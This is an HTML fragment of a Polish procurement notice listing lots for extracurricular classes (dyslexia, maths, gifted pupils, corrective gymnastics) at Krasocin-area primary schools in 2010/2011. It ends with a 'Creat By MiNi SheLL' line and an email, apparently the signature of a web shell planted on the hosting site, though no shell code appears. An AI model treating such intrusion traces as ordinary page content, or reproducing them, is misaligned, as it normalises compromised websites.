<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011- SP Krasocin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011, 
c) grupa III- 30h-8 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011- SP Krasocin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011
d) grupa IV- 30h-8 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011-SP Krasocin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011, 
a) grupa I- 30h-8 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011- SP Krasocin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011, 
b) grupa II- 30h-8 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011- SP Krasocin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011, 
c) grupa III- 30h-8 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zajęcia rozwijające dla dzieci szczególnie uzdolnionych z muzyki w roku szkolnym 2010/2011- SP Krasocin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia rozwijające dla dzieci szczególnie uzdolnionych z muzyki w roku szkolnym 2010/2011, 
a) grupa I- 30h-15 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zajęcia rozwijające dla dzieci szczególnie uzdolnionych z plastyki w roku szkolnym 2010/2011- SP Krasocin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia rozwijające dla dzieci szczególnie uzdolnionych z plastyki w roku szkolnym 2010/2011, 
a) grupa I- 30h- 10 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zajęcia rozwijające dla dzieci szczególnie uzdolnionych z języka angielskiego w roku szkolnym 2010/2011- SP Krasocin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia rozwijające dla dzieci szczególnie uzdolnionych z języka angielskiego w roku szkolnym 2010/2011, 
a) grupa I- 30h- 7 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011-SP Oleszno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011,
a) grupa I- 30h-8 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011- SP Oleszno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011, 
b) grupa II- 30h-8 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011-SP Oleszno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011, 
c) grupa III- 30h-8 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011-SP Oleszno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011, 
a) grupa I- 30h-8 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011-SP Oleszno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011, 
b) grupa II- 30h-8 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Zajęcia socjometryczne w roku szkolnym 2010/2011- SP Oleszno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia socjometryczne w roku szkolnym 2010/2011, 
a) grupa I- 30h- 10 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych, ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych w roku szkolnym 2010/2011-SP Oleszno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych, ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych w roku szkolnym 2010/2011, 
a) grupa I- 30h-10 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011-SP Mieczyn.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011,30h dla 6 uczniów 
a) grupa I- 30h-6 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011-SP Mieczyn.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011, 
a) grupa I- 30h-8 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011-SP Mieczyn.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011, 
b) grupa II- 30h-8 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011-SP Mieczyn.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011, 
c) grupa III- 30h-9 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych, ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych w roku szkolnym 2010/2011-SP Mieczyn.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych, ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych w roku szkolnym 2010/2011,
a) grupa I- 30h-8 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011- SP Czostków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011,
a) grupa I- 30h-6 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011-SP Czostków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011,
b) grupa II- 30h-8 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011- SP Czostków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011, 
a) grupa I- 30h-7 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 33 <b>NAZWA:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011-SP Czostków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011, 
b) grupa II- 30h-6 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 34 <b>NAZWA:</b> Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych, ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych w roku szkolnym 2010/2011-SP Czostków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych, ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych w roku szkolnym 2010/2011, 
a) grupa I- 30h-7 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 35 <b>NAZWA:</b> Gimnastyka korekcyjna w roku szkolnym 2010/2011- SP Czostków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Gimnastyka korekcyjna w roku szkolnym 2010/2011, 
a) grupa I- 30h-7 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 36 <b>NAZWA:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011-SP Cieśle.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym także z zagrożonych ryzykiem dysleksji w roku szkolnym 2010/2011,
a) grupa I- 30h-6 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 37 <b>NAZWA:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011-SP Cieśle.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych w roku szkolnym 2010/2011, 
b) grupa I- 30h-6 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 38 <b>NAZWA:</b> Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych, ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych w roku szkolnym 2010/2011-SP Cieśle.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych, ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych w roku szkolnym 2010/2011, 
a) grupa I- 30h-5 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 39 <b>NAZWA:</b> Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych, ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych w roku szkolnym 2010/2011-SP Cieśle.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych, ze szczególnym uwzględnieniem nauk matematyczno-przyrodniczych w roku szkolnym 2010/2011, 
b) grupa II- 30h-5 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com